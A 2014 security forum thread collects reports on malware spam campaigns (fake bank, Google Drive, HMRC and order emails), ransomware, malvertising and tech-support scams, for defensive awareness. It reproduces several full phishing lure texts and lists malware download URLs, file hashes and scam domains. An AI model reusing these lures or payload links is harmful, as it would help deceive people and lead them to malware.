View Full Version : SPAM frauds, fakes, and other MALWARE deliveries...
AplusWebMaster
2014-08-13, 12:18
FYI...
Fake Google drive SPAM - PDF malware
- http://myonlinesecurity.co.uk/grady-murphy-shared-google-drive3623019-73-malware/
13 Aug 2014 - "Grady Murphy shared Google Drive:3623019-73 to submit@ < your email address>.pretending to come from Grady Murphy < random name that matches the name inside the email> , Apps Team is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... There are several different versions of this email leading to different infection sites and links, The names of the alleged Google Drive owner who wants to share with you changes with each email. There is no attachment with this one and they want you to follow the link and download the file to infect you.
Some of the sites are
http ://energydep .net:8080/Gdrive/GDrive025384.exe
http ://bilingdepp .net:8080/Gdrive/GDrive917302.exe
Email looks like:
Accept Grady Murphy Google Drive ID:3623019-73 request clicking on the link below:
Confirm request
Unfortunately, this email is an automated notification, which is unable to receive replies. We’re happy to help you with any questions or concerns you may have. Please contact us directly 24/7 via google .com/support/
13 August 2014: GDrive925483.exe (40kb) Current Virus total detections: 6/54*
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/28fd5d98d57d2289edfc3a327f7b9f493d4fc58c51a70cfbbd6b3474f7c65f68/analysis/1407913490/
178.238.236.109: https://www.virustotal.com/en/ip-address/178.238.236.109/information/
___
Fake PurelyGadgets SPAM - Word doc malware
- http://myonlinesecurity.co.uk/order-id-769019-purelygadgets-com-word-doc-malware-malware/
13 Aug 2013 - "Order id 769019 | PurelyGadgets .com pretending to come from a sender named inform at a random email address is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email arrives written in German language and has a zip attachment that when unzipped drops what appears to be a genuine Word Doc. BUT the Doc contains a macro that will infect you, if you use an out of date or older version of word. On previewing it, or opening it in Word 2013 ( which has macros disabled by default ) it tries to tell you to enable macros so that you can read the document. Do -not- ever -enable- macros for any Microsoft office file received by email unless you are 100% sure that you know the sender and are expecting the file... If you still use an older version of Microsoft Word, then you are at risk of being infected by this... Office 2010 and Office 2013 have macros -disabled- by default...
13 August 2014: Bestellen.zip (100 kb) : Extracts to Bestellen.Doc
Current Virus total detections: 10/54* . All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... when unzipping them and make sure you have “show known file extensions enabled“, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened..."
* https://www.virustotal.com/en/file/3d53b54d98e14f9de2a2316fe09ee6b9fe27f2dacdd4ad85f52dd1e16eebb006/analysis/1407936811/
___
UK Land Registry Spam
- http://threattrack.tumblr.com/post/94637538213/uk-land-registry-spam
Aug 13, 2014 - "Subjects Seen:
Notification of direct debit of fees
Typical e-mail details:
Notification Number: 4682787
Mandate Number: LND4682787
###THIS IS AN AUTO NOTIFICATION EMAIL. DO NOT REPLY TO THE SENDER OF THIS EMAIL. IF YOU HAVE A QUERY PLEASE REFER TO THE INFORMATION BELOW ###
This is notification that Land Registry will debit 1527.00 GBP from your nominated account on or as soon as possible before 18/08/2014.
Details of fees that we shall be collecting by direct debit for the applications charged are now available to view.
You can access these by opening attached report.
If you have an enquiry relating to your VDD account please contact Customer Support at customersupport@ landregistry .gsi .gov.uk or call on 0844 892 1111. For all enquiries, please quote your key number.
Thank you,
Land Registry
Malicious File Name and MD5:
LND_Report_13082014.exe (4E3480ADAF846BE2073246C9879290D2)
LND_Report_4682787.zip (EAD6A8A2A9613175112E6C75D247B0BC)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/8c26e0fcb0496b40853e9589e35632c0/tumblr_inline_na95u2Ihd01r6pupn.png
Tagged: UK Land Registry, Upatre
:fear: :mad: :sad:
AplusWebMaster
2014-08-14, 13:54
FYI...
Fake Citicorp SPAM – PDF malware
- http://myonlinesecurity.co.uk/citicorp-mail-report-attached-fake-pdf-malware/
14 Aug 2014 - "Citicorp Mail Out Report Attached pretending to come from CITICorp <random name @ citicorp .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email looks like:
From Securitas, please do not reply to this e-mail as it is auto generated.
For any problems please e-mail derry.andrews@ securitas .uk .com
14 August 2014 Q100515078_Mail Out Report.zip (9kb): Extracts to Q100229861_Mail Out Report.exe
Current Virus total detections: 3/54* . This Citicorp Mail Out Report Attached is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/0875c59c8f7c69befb7dce934db7c9652614a9ad90cabc37721f56114bb026f0/analysis/1408010403/
___
Fake Charity Trends SPAM ...
- http://blog.mxlab.eu/2014/08/14/backdoor-bot-ed-attached-to-emails-with-subject-like-oder-invoice-9156230_08-xls/
Aug 14, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Oder invoice 9156230_08.xls”. This email is send from the spoofed address and has the following body:
Dear *******@*******.co.uk,
Please find attached invoice #9156230_08 from 13/08/2014.
Thanks!
Reyes Mcdaniel .
We’re happy to help you with any questions or concerns you may have. Please contact us directly 24/7 via hxxp ://www.charitytrends .org/ContactUs.aspx
The attached ZIP file has the name 9156230_08.zip which contains the folder Inv_3145835_453_979154.xls. In this folder the 131 kB large file Inv_3145835_453_979154.xls.scr is found. Please note that the subject line and attachment file names may change with each message.
The trojan is known as Backdoor.Bot.ED. At the time of writing, 1 of the 53 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/4ac7416ea64789afabee6c7ff152cf4c552c303baef009270adca11238667bc4/analysis/1408011038/
- http://blog.mxlab.eu/2014/08/14/fake-charity-trends-email-regarding-donation-contains-trojan/
Aug 14, 2014 - "... intercept a new trojan distribution campaign by email with the subject “Thank you for your generous donation! Charity Trends .”. This email is send from the spoofed address and has the following body:
Charity Trends®
Dear *******@*******.com,
Thank you for your generous donation of 2623 GBP, which we received today.
Your generosity will make an immediate difference in the lives of many people who need your help. The funds raised will go toward them.
You will find all information about your donation in zip archive.You are making a difference!
Thanks again for your kindness,
Elsa Nash ...
The attached ZIP file has the name DON_9683272_90.zip and contains the folder DON_4356984_08_14_14. Indside this folder, the 102 kB large file DON_4356_45984_08_14_14.scr will be found. Please note that the subject line and attachment file names may change with each message. The trojan is known as Trojan/Win32.Zbot, Win32:Malware-gen, HEUR/Malware.QVM20.Gen or Mal/Generic-S... 4/54 VirusTotal*..."
* https://www.virustotal.com/en/file/3158101b5a61094a960bc3e4a17240c153efa8cbb6b1eaa26e6d2ab6c06cafe9/analysis/1408011666/
___
Fake Citibank SPAM - PDF malware
- http://myonlinesecurity.co.uk/citibank-re-account-documents-uploaded-fake-pdf-malware/
14 Aug 2014 - "'Citibank RE: Account documents' have been uploaded pretending to come from Citibank <noreply@ citibank .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email looks like"
citibank .com
RE: Account Documents
To: <REDACTED>
Case: C4055427
Your Documents have been uploaded to dropbox. In order to download / view Please click here to download / view .
All web filed documents (with the exception of downloaded accounts templates) are available to view / download for 10 days after their original submission. Once accepted, these changes will be displayed on the public record...
14 August 2014 Document-7119.zip ; Extracts to Document-7119.scr ;
Current Virus total detections: 0/54* . This 'Citibank RE: Account documents have been uploaded' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/110dc2cdabc3ffcc924312b44e025072ec2641bf55bdcc8abdc426ddd9e8eced/analysis/1408029154/
___
ZeroLocker
- http://www.webroot.com/blog/2014/08/14/zero-locker/
Aug 14, 2014 - "... we saw FireEye and Fox-IT provide the ability to decrypt files encrypted by older crpytolocker variants. They used the command and control servers seized by the FBI during operation Tovar. Since they have access to those RSA keys they essentially have the password required for every single file encrypted by a Cryptolocker variant that used Evgeniy Bogachev’s botnet. That is a major portion of the traditional red GUI cryptolocker that became famous... since the emergence of their tool to decrypt files for free, there has been a new encrypting ransomware going around that aims at scamming you into thinking this is a similar helpful tool – except that it demands something all -scams- do - payment:
> https://www.webroot.com/blog/wp-content/uploads/2014/08/blograrw.bmp
This newest edition to the ever popular business model that is encrypting ransomware doesn’t really have many improvements over the others we’ve already seen. Using -Bitcoin- for payment is standard now. This variant doesn’t show the GUI untill all encryption is completed and the computer is suddenly restarted. Upon restart this window is presented and threatens that you will lose all your files if you close or remove it. The payment structure is right where industry average is – PAINFUL. This specific variant we analyzed does not delete the VSS (Volume Shadow Service) and you can get all your files back by using programs like Shadow Explorer... expect issues like this to be fixed once this malware is adopted by more botnets for widespread distribution... remember that with encrypting ransomware the best protection is going to be a good backup solution. This can be either through the cloud or offline external storage. Keeping it up to date is key so as not to lose productivity..."
___
Suspicious login message Faked, distributes Backdoor
- http://blog.trendmicro.com/trendlabs-security-intelligence/suspicious-login-message-faked-distributes-backdoor/
Aug 14, 2014 - "Legitimate services are often used by cybercriminals to try and make their attacks more convincing. Recently, I spotted attacks that used services and platforms like Google Drive and Dropbox in order to look less suspicious to unwary users. I received a spammed message like the one shown right below that supposedly came from Gmail itself. It warned me that someone logged into my account from an unknown device. However, all of the links in it pointed to a Google Drive URL:
Sample spam email:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/08/login3.png
Even though the email message is -similar- to a legitimate Gmail message, a careful user will note that the displayed e-mail address and the supposed source address did -not- match. Further examination of the email’s headers indicates that the email was, in fact, sent via a website’s mail form... all the links provided in the email actually go to an HTML file hosted on Google Drive. This HTML file is used to detect the operating system and browser of the user... Further code also differentiates what payloads are delivered based on the user’s browser. This is what the user would see (here, running Firefox):
Fake plugin download page:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/08/login2.png
... while the HTML code can differentiate between different configurations, a relatively limited number of payloads are actually delivered. These are detected as BKDR_PERCS.A. This -backdoor- steals email credentials and user names and passwords. It also logs -keystrokes- as part of its information theft routines. As a backdoor, it can also accept remote commands from the attackers... The actual malicious payloads are hosted on Google Drive as well. The attackers upload new files to be used in this attack on a fairly regular basis, although the behavior remains the same... As these files are located on legitimate services, they are also sent via HTTPS, which helps evade some web filtering techniques. In addition, it used a -compromised- website’s mailer system and an IPv6 address, which can also evade email reputation services..."
(More detail at the trendmicro URL at the top.)
___
Beware of Risky Ads on Tumblr
- https://blog.malwarebytes.org/malvertising-2/2014/08/beware-of-risky-ads-on-tumblr/
Aug 14, 2014 - "Online users have come to rely on social media and social networking sites to also update them on current events and commentaries, general news, and what’s happening just down the street and around the corner. Twitter and Facebook are the first go-to sites for most when it comes to real-time news updates. For some, Tumblr.
dailynewsz[dot]tumblr[dot]com
We found the above site posting what appears as news clips but not on a daily basis, as indicated in the URL, unfortunately. According to Google Translate, the site uses both Swahili and Urdu. This site serves ads on its default page and on individual posts. So every time someone shares one, the ads are shared with it. Below is a screenshot of a post:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/dailynewsz-post.png
Online advertisement is a major source of revenue. Unfortunately, normal ads can easily become malvertisements, serving as a go-between for users and sites hosting -malicious- software. For this particular Tumblr page, it uses the ad network Yllix Media. Google Safe Browsing profiled its official website here*. Other third-party sites either blacklist** the domain or flag it as untrustworthy*** due to its history of leading users to infected sites. As of this writing, the ads are benign, but we may never know several months from now if this will still be the case... we encourage you to use ad blockers, such as AdBlock Plus (ABP) or NoScript (for Mozilla-based browsers only), if you don’t want ads to appear on sites you visit..."
* https://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=yllix.com/
** http://labs.sucuri.net/?blacklist=yllix.com
*** https://www.mywot.com/en/scorecard/yllix.com
:fear::fear: :mad:
AplusWebMaster
2014-08-15, 17:11
FYI...
Fake Barclays SPAM - Trojan.Ransom.ED
- http://blog.mxlab.eu/2014/08/15/fake-email-transaction-completed-from-barclays-contains-trojan-ransom-ed/
Aug 15, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Your transaction is completed”. This email is send from the spoofed address “Barclays.NET” <support@ barclays .net>” and has the following body:
Transaction is completed. 8678 GBP has been successfully transfered.
If the transaction was made by mistake please contact our customer service.
Payment receipt is attached.
*** This is an automatically generated email, please do not reply ***
Barclays.Net 2013 Corporation. All rights reserved.
The attached ZIP file has the name Payment receipt 1534465.zip and contains the 70 kB large file Payment receipt 8821991.exe (note: file name may vary with each email). The trojan is known as Trojan.Ransom.ED or Mal/Generic-S. At the time of writing, 2 of the 54 engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/baa52d35dd98c788729f661c9c9d7b4053fcbdb3083943b9d517b83fe38063a6/analysis/1408097500/
___
Fake VOIP SPAM - Word macro script
- http://blog.mxlab.eu/2014/08/15/fake-email-from-voip-inc-installs-trojan-downloader-using-word-macro-script/
Aug 15, 2014 - "... intercepted a campaign by email with the subject “Your Order No 355253536 | Mob Inc.” which includes a malicious Word document that allows the installation of a trojan downloader using the macro functionality from Word. This email is send from the spoofed addresses and has the following body:
Thank you for ordering from VOIP Inc.
This message is to inform you that your order has been received and is currently being processed.
Your order reference is 488910845598.
You will need this in all correspondence.
This receipt is NOT proof of purchase.
We will send a printed invoice by mail to your billing address.
You have chosen to pay by credit card. Your card will be charged for the amount
of 805.74 USD and “VOIP Inc.”
will appear next to the charge on your statement.
Your purchase information appears below in the file.
The attached ZIP file has the name Order.zip and contains the 41 kB large file Order.Doc. The Order.Doc is a genuine Word document but the file contains a malicious macro feature. Once opening the Word document, instructions are given on how to enable the content and activate the -malicious- macro script... The downloader is known as W97M/Downloader, MO97:Downloader-DU, VBA/TrojanDownloader.Agent.AL, Trojan-Downloader:W32/Agent.DVCR, Trojan-Downloader.VBA.Agent or Trojan.Mdropper. At the time of writing, 8 of the 53 AV engines did detect the trojan downloader at Virus Total*..."
* https://www.virustotal.com/en/file/af8694825d3d7eb470255b9dd858e6544ac54df9295bb373bc8205e8fe27722c/analysis/1408099896/
:mad: :fear::fear:
AplusWebMaster
2014-08-19, 20:06
FYI...
Fake Companies House Spam
- http://threattrack.tumblr.com/post/95187807503/companies-house-annual-return-spam
Aug 19, 2014 - "Subjects Seen:
(AR01) Annual Return received
Typical e-mail details:
Thank you for completing a submission Reference # (9586474).
(AR01) Annual Return
Your unique submission number is 9586474
Please quote this number in any communications with Companies House.
Check attachment to confirm acceptance or rejection of this filing.
Malicious File Name and MD5:
AR01_021434.scr (3324B40B5D213BEC291F9F86F0D80F64)
AR01_021434.zip (7D65D78B6E35843B6FF3C4C46BAAC37A)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/342609410f7d088e77e269adf8ed8b38/tumblr_inline_nak1zyZubX1r6pupn.png
Tagged: Companies House, Upatre
___
JPMorgan Chase Secure Message Spam
- http://threattrack.tumblr.com/post/95215399913/jpmorgan-chase-secure-message-spam
Aug 19, 2014 - "Subjects Seen:
Daily Report - August 19, 2014
Typical e-mail details:
This is a secure, encrypted message.
Desktop Users:
Open the attachment (message_zdm.html) and follow the instructions.
Mobile Users:
Voltage secure mail is not currently supported on mobile devices. If you experience issues, please access your secure message from a fully functional browser.
Malicious URLs:
192.241.124.71 /securemail/jpmchase.com/formpostdir/Java/Java_update.exe
Malicious File Name and MD5:
message_zdm.html (550CB01F07DB2363437C8627697C6B1F)
Java_update.exe (38d75db0a575891506b1ff0484a03cd0)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/332320ce00484e282636a9e2d20b0764/tumblr_inline_naklp7JVOT1r6pupn.png
192.241.124.71: https://www.virustotal.com/en/ip-address/192.241.124.71/information/
Tagged: JPMorgan, Chase, Dyreza
___
- http://myonlinesecurity.co.uk/jpmorgan-chase-co-daily-report-august-19-2014-malware/
Aug 19 2014 - "'JPMorgan Chase & Co Daily Report – August 19, 2014' pretending to come from various names at @ jpmorgan .com is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... email looks like:
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/08/Daily-Report-August-19-2014.png
... the html attachment that comes with the email l0oks like the below and clicking the link hidden behind the Click to read message button leads to a fake Java_update.exe
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/08/Daily-Report-August-19-2014_2.png
Todays Date: Java_update.exe .. Current Virus total detections: 5/53*
All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... careful when unzipping them and make sure you have “show known file extensions enabled“, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened..."
* https://www.virustotal.com/en/file/003529bb37382ad19d22b39d3295e297220c21d59418eb1b861ac3a7fb012a96/analysis/
___
Fake Evernote extension serves Ads
- https://blog.malwarebytes.org/intelligence/2014/08/fake-evernote-extension-serves-advertisements/
Aug 19, 2014 - "... a Multiplug PUP that installs a -fake- Evernote browser extension. Fellow researchers can find the link to this sample on VirusTotal here*...
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/cert_info.png
When you execute the PUP, it silently installs a web extension for the Google Chrome, Torch, and Comodo Dragon browsers. The extension takes the form of three obfuscated JavaScript files and one HTML file. The picture shows these files installed in Chrome’s extension directory on a Windows 7 PC.
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/chrome_ext_files.png
... The extension that’s installed is called “Evernote Web,” just like the real extension from Evernote.com. When taking a look at the Chrome extensions page, we can see the extension installed there with the ID “lbfehkoinhhcknnbdgnnmjhiladcgbol,” just like the real Evernote Web extension.
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/evernote.png
Clicking “Visit website” directs the user to the chrome webstore page for the actual Evernote Web extension. Chrome believes the real extension is installed, as verified by the Launch App button. When clicking this button with the fake extension installed, nothing happens, whereas normally the user is met with an Evernote log in screen.
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/fake_evernote_chrome_store.png
On the surface, it may seem like the pop ups and advertisements are coming from the websites themselves, but are in fact from the fake Evernote web extension.
Fortunately, removing the extension is a simple task. For Chrome users, simply visit the extensions page and click the picture of a garbage can, and you’re done. You also might want to run a free scan using your Antivirus or Anti-malware programs (like Malwarebytes Anti-Malware) to make sure there wasn’t anything -else- added while you had the extension."
* https://www.virustotal.com/en/file/6a15febcf9a963a2c5122a71d690b5987f78d59b7e9bc5f28f991ce53043fbf4/analysis/
___
Fake Scotiabank SPAM – PDF malware
- http://myonlinesecurity.co.uk/scotiabank-new-instructions-international-local-transfers-fake-pdf-malware/
18 Aug 2014 - "Scotiabank New Instructions for International and local transfers pretending to come from Mallerlyn Bido <mallerlyn.bido@ scotiabank .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
Dear Clients
Hereby we inform you that starting next Tuesday, August 19 all instructions of local and international transfers that are sent to our institution must be completed by a transfer form specifically allocated for the purpose, which will be replacing the letter instruction tend to complete.
This new document has been implemented to meet international requirements and simultaneously control to make their operations safer.
We take this opportunity to inform you that the operations of International Transfers can be made via our internet platform banking the need to complete these types of forms.
Annex find the forms that apply to transfers in USD and EUR as well as the form used for ACH transfers manuals with some notes to use as a guide to complete. These templates can be saved for you with your details for future use.(See attached file: Outgoing Global.doc Form) (See attached file: Outgoing JPM.doc Form) (See attached file: Form ACH..doc) ...
Best regards,
Mallerlyn Bido | Gerente Soporte al Cliente | BSC ...
18 August 2014: New Instructions for International and Local transfers.zip ( 8kb) :
Extracts to New Instructions for International and Local transfers.exe
Current Virus total detections: 3/52* . This Scotiabank New Instructions for International and local transfers is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/2d844bbc8af9af835423ef9d862d86eac7f2f07812c0e0b263124de9e9d98b68/analysis/1408393889/
:mad: :fear:
AplusWebMaster
2014-08-20, 14:07
FYI...
Cryptolocker flogged on YouTube
- http://www.theregister.co.uk/2014/08/20/cryptolocker_flogged_on_youtube/
20 Aug 2014 - "Cryptolocker is being flogged over YouTube by vxers who have bought advertising space... researchers made the discovery while monitoring YouTube and website banners for instances where malware writers had actually purchased space to foist their wares on -unpatched- web users. The duo who will present at the upcoming Virus Bulletin 2014 conference in Seattle wrote in a paper advertisement networks was a viable way to flog virus and trojans. "We conclude that ad networks could be leveraged to aid, or even be substituted for current exploit kits," they said. Purchased ad space was a cheap and effective means of foisting browser malware allowing attackers to filter victims by language, location, and interests, VB reported. Malware contained in ads could be obfuscated and then unleashed once conditions like operating systems, browser versions and other elements were met.
> http://regmedia.co.uk/2014/08/19/tghfgh55.png
CryptoLocker surfaced in September distributed through Gameover ZeuS. It encrypted important files such as images and documents on compromised Windows machines before demanding that victim pay up to $500 in BitCoins within 72 hours for the private keys necessary to unlock files. CryptoLocker used AES symmetric cryptography to encrypt the files and encrypted the AES key with an RSA-2048 bit public key generated on its server side. It came as -malvertisers- were caught flinging malware over Yahoo! ad networks*...
> http://regmedia.co.uk/2014/08/19/fghji87y6t.png
... Many excess ad spaces were flogged through affiliates which may accept advertisements without checking the authenticity of the buyer nor the code to be run. Even those that do could end up foisting malware if they failed to detect an attackers' code alterations made after the purchase in order to quietly slip in the malware. The research pair said there was very little advertising networks could do to prevent the attacks."
* http://www.theregister.co.uk/2014/08/11/cryptowall_malvertising_yahoo_ad_network/
> https://www.virusbtn.com/conference/vb2014/abstracts/KashyapKotovNavaraj.xml
___
Fake Order SPAM – PDF malware
- http://myonlinesecurity.co.uk/order-pdf-malware/
20 Aug 2014 - "'Order – PDF' which comes as an email with a subject of order-6539-8.20.2014.pdf ( where the number is random & the date changes daily is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... These emails have no body content and just a subject of order-6539-8.20.2014.pdf ( the number is random ) They appear to come from a load of common first names with weird characters form the second part of the alleged senders... previous post about this type of attack:
- http://myonlinesecurity.co.uk/infected-malformed-pdf-attachments-emails/
Today’s version although it pretends to be a PDF file is actually a zip file that probably either use some unknown exploit to extract it or the bad actors sending today’s malware have misconfigured the botnet sending it and it won’t automatically extract at all so users will be safe...
20 August 2014: order-6539-8.20.2014.pdf (84 kb) Extracts to order 8.20.2014.exe
Current Virus total detections for pdf is : 2/50* . Current Virus total detections for the extracted .exe : 2/53** . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/f84c3bb9f4dcb2961193ad4cdbcd7e882a14f0e19a5f8f68c8aa8c5bd73ba7e0/analysis/1408523288/
** https://www.virustotal.com/en/file/3e135db147e93080de32d3bc5eb27049dec5542493062cc2c7e338d901ddf559/analysis/1408523722/
___
'Reveton' ransomware adds powerful password stealer
- https://www.computerworld.com/s/article/9250503/_Reveton_ransomware_adds_powerful_password_stealer
Aug 20, 2014 - ""A type of malware called Reveton, which -falsely- warns users they've broken the law and demands payment of a fine, has been -upgraded- with powerful password stealing functions, according to Avast*. Reveton is in a class of nasty programs known as "ransomware," which includes the notorious Cryptolocker program that encrypts a computer's files. The FBI issued a warning about Reveton in August 2012 after its Internet Crime Complaint Center was flooded with complaints. The malware often infects computers via drive-by download when a person visits a website rigged to automatically exploit software vulnerabilities. Users are helpless after the computer is locked, with Reveton demanding a few hundred dollars as ransom payable various web-money services... The version of Reveton analyzed by Avast also has another password stealer from the Papras family of malware. It's not as effective as Pony but can disable security programs, the company wrote on its blog*. This particular sample of Reveton was pre-programmed to search a web browser's history and cookies to see if the user had visited online sites of 17 German banks... Around February 2013, an ethnic Russian man was arrested in Dubai upon request of Spanish police for allegedly coordinating Reveton campaigns, netting... US$1.3 million. Ten other people were also arrested on money laundering charges for allegedly laundering the proceeds and transferring funds to Russia, according to Trend Micro**."
* http://blog.avast.com/2014/08/19/reveton-ransomware-has-dangerously-evolved/
** http://blog.trendmicro.com/trendlabs-security-intelligence/key-figure-in-police-ransomware-activity-nabbed-2/
___
Linux Trojan makes the jump to Windows
- http://www.theinquirer.net/inquirer/news/2361245/chinese-linux-trojan-makes-the-jump-to-windows
Aug 20 2014 - "... the original malware known as "Linux.Dnsamp" is a Distributed Denial of Service (DDoS) Trojan, which, according to the company blog*, transfers between Linux machines, altering the startup scripts, collecting and sending machine configuration data to the hackers' server and then running silently waiting for orders. Now it appears that the same hackers have ported the Trojan to run in Windows as "Trojan.Dnsamp.1"**. The Windows version gains entry to the system under the guise of a Windows Service Test called "My Test 1". It is then saved in the system folder of the infected machine under the name "vmware-vmx.exe". When triggered, just like its Linux counterpart, the Trojan sends system information back to the hackers' central server and then awaits the signal to start a DDoS attack or start downloading other malicious programs... Although the threat of malware is an everyday hazard to most computer users, to find an attack on Linux is much rarer, and to find any kind of malware that has been ported from one operating system to another is almost unheard of... Project Shield***, an initative designed to help smaller web servers fight off DDoS attacks."
* http://news.drweb.com/show/?i=5760&c=23&lng=en&p=1
** http://news.drweb.com/show/?i=5903&lng=en&c=14
*** https://projectshield.withgoogle.com/en/
:mad::mad: :fear:
AplusWebMaster
2014-08-21, 16:30
FYI...
Tech Support SCAMS rip big brand security software with fake warnings
- https://blog.malwarebytes.org/fraud-scam/2014/08/tech-support-scammers-rip-big-brand-security-software-with-fake-warnings/
Aug 21 2014 - "... bogus tech support. If you are looking to download one of the popular antivirus or anti-malware product on the market, watch out before you click.
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/listAVs-965x395.png
Lookalike pages: Fraudsters have set up -fake- download pages that look incredibly like the authentic ones... Hijacked software: Each page links to a download, which of course is -not- the actual software...
> https://blog.malwarebytes.org/wp-content/uploads/2014/07/software.png
The purpose of these fake programs is to trick people into thinking something is wrong with their computers:
> https://blog.malwarebytes.org/wp-content/uploads/2014/07/error.png
The fake pages are hosted here:
hzzzp ://onlineinstanthelp .com/antivirus-download.html
hzzzp ://onlineinstanthelp .com/norton-us/download.html
hzzzp ://onlineinstanthelp .com/mcafee-us/download.html
hzzzp ://onlineinstanthelp .com/avg-us/download.html
hzzzp ://onlineinstanthelp .com/malwarebytes-us/download.html
hzzzp ://onlineinstanthelp .com/winzip-us/download.html
hzzzp ://onlineinstanthelp .com/lavasoft-us/download.html
The company providing ‘support’ is: wefixbrowsers .com ... We are reporting the sites to the registrar and passing on the LogMeIn codes so that interested parties can take appropriate actions. To avoid these -fake- installers, users should always go to the company’s official website..."
(More detail at the malwarebytes URL at the top.)
wefixbrowsers .com / 23.91.123.204: https://www.virustotal.com/en/ip-address/23.91.123.204/information/
onlineinstanthelp .com / 118.139.186.35: https://www.virustotal.com/en/ip-address/118.139.186.35/information/
___
Fake HMRC SPAM - malware
- http://myonlinesecurity.co.uk/helping-business-onile-malware/
21 Aug 2014 - "'Helping your Business onile' pretending to come from 'HMRC Business Help and Education Emails' is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email looks like:
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/08/Helping-your-Business-onile.png
21 August 2014 Credit_file_961529461.zip ( 50 kb)... Current Virus total detections: 1/51*
... targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. Be very careful when unzipping them and make sure you have “show known file extensions enabled“, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened..."
* https://www.virustotal.com/en/file/050eae9a0470d35275c74159872ddf4232430ec6890b3d411769e2622c0183f8/analysis/1408620337/
___
Fake Credit reference SPAM - word Doc malware
- http://myonlinesecurity.co.uk/re-credit-reference-file-request-108278994-fake-word-doc-malware/
21 Aug 2014 - "'RE: Credit reference file request.(108278994)' is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
Dear <REDACTED>
You have obtain a copy of your credit reference file.
We’re happy to help you with any questions or concerns you may have. Please contact us directly 24/7 .
Lynn Buck.
21 August 2014: Credit_file_108278994.zip (52 kb): Extracts to Credit reference file.doc.scr
Current Virus total detections: 2/52*
21 August 2014: Credit_file_642094175.zip (85kb): Extracts to credit_reference_file.xls.scr
Current Virus total detections: 2/52*
This 'RE: Credit reference file request.(108278994)' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper word file instead of the .scr executable file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/4326821ac04b6e7d4c36093065b01e7d2ea6931818532c01a5988d2782110aaf/analysis/1408613742/
___
JPMorgan customers targeted in phishing campaign
- http://www.reuters.com/article/2014/08/21/us-cybercrime-jpmorgan-spam-idUSKBN0GL20R20140821
Aug 21, 2014 - "Fraudsters are targeting JPMorgan Chase & Co customers in an email "phishing" campaign that is unusual because it attempts to collect credentials for that bank and also infect PCs with a virus for stealing passwords from -other- institutions. The campaign, dubbed "Smash and Grab," was launched on Tuesday with a widely distributed email that urged recipients to click to view a secure message from JPMorgan, according to security researchers with corporate email provider Proofpoint Inc. JPMorgan, the No. 1 U.S. bank by assets, confirmed that spammers had launched a phishing campaign targeting its customers... the bank believes most of the spam was stopped by fraud filters at large Internet providers, adding that the email looked realistic because the attackers apparently used a screen grab from an authentic email sent by the bank. Users who click on a malicious link are asked to enter credentials for accessing accounts with JPMorgan. Even if they did not comply, the site attempted to automatically install the Dyre banking Trojan* on their PCs, according to Proofpoint. Dyre is a recently discovered piece of malware that seeks credentials from customers of Bank of America Corp, Citigroup Inc and the Royal Bank of Scotland Group PLC, according to email security firm Phishme."
